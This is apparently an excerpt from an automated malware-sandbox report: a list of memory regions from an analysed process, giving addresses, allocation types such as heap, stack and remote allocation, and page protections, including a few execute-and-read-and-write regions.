page read and write
|
||
434000
|
unkown
|
page read and write
|
||
43F000
|
unkown
|
page readonly
|
||
6D10000
|
direct allocation
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
2D68000
|
heap
|
page read and write
|
||
378F000
|
unkown
|
page read and write
|
||
2CF2000
|
trusted library allocation
|
page read and write
|
||
22BBE000
|
stack
|
page read and write
|
||
22330000
|
heap
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
DDB3579000
|
stack
|
page read and write
|
||
2414000
|
heap
|
page read and write
|
||
6B5E000
|
stack
|
page read and write
|
||
2D5E000
|
stack
|
page read and write
|
||
2CA16C5C000
|
heap
|
page read and write
|
||
8070000
|
trusted library allocation
|
page read and write
|
||
2CA16CA1000
|
heap
|
page read and write
|
||
8660000
|
direct allocation
|
page execute and read and write
|
||
72D1000
|
heap
|
page read and write
|
||
2307E000
|
stack
|
page read and write
|
||
2367F000
|
stack
|
page read and write
|
||
2A40000
|
heap
|
page read and write
|
||
4B03000
|
trusted library allocation
|
page read and write
|
||
71C0000
|
heap
|
page read and write
|
||
7590000
|
trusted library allocation
|
page read and write
|
||
388F000
|
stack
|
page read and write
|
||
DDB3D7E000
|
unkown
|
page readonly
|
||
35B2000
|
heap
|
page read and write
|
||
335D000
|
stack
|
page read and write
|
||
8140000
|
trusted library allocation
|
page execute and read and write
|
||
6FF000
|
heap
|
page read and write
|
||
2B90000
|
direct allocation
|
page read and write
|
||
2CA1C4B0000
|
remote allocation
|
page read and write
|
There are 499 hidden memdumps, click here to show them.